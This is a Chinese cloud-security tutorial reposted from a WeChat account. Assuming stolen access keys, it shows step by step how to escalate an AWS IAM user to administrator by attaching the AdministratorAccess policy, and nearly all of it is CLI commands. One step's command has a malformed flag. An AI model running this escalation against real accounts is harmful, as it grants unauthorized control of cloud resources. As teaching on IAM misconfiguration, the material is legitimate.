国内云安全培训请点击原文或访问以下链接
https://www.yuque.com/u8047536/supvqp/ri4ft0
前提是已经获取了相关的密钥
步骤 1:将 AWS CLI配置为访问凭证
命令:
aws configure
步骤 2: 列出附加到 XX用户的策略
aws iam list-attached-policies --user-name xx
步骤 3:检查服务(Service)策略的策略详细信息
aws iam get-policy --policy-arn arn:aws:iam::6xxxxxxxxxx6:policy/Service
步骤 4:查看 v1版本的服务(Service)策略的策略详细信息
aws iam get-policy-version --policy-arn arn:aws:iam::6xxxxxxxx6:policy/Service --version-id v1
步骤 5:尝试创建一个名为 bob 的新用户
aws iam create-user --user-name Bob
由于权限不足,用户创建失败。
步骤 6:获取管理员访问(AdministratorAccess)策略
aws iam list-policies | grep 'AdministratorAccess'
步骤 7:将管理员策略(AdministratorAccess)附加到当前用户,并通过列出策略进行确认
aws iam attach-user-policy --user-name xx --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam list-attached-policies --user-name xx
步骤 8:尝试创建Bob的新用户来验证管理员访问权限
aws iam create-user -user-name Bob
已成功执行特权操作
References:
1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)
原文始发于微信公众号(关注安全技术):AWS云安全系列 4 - IAM不严谨的权限 I
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论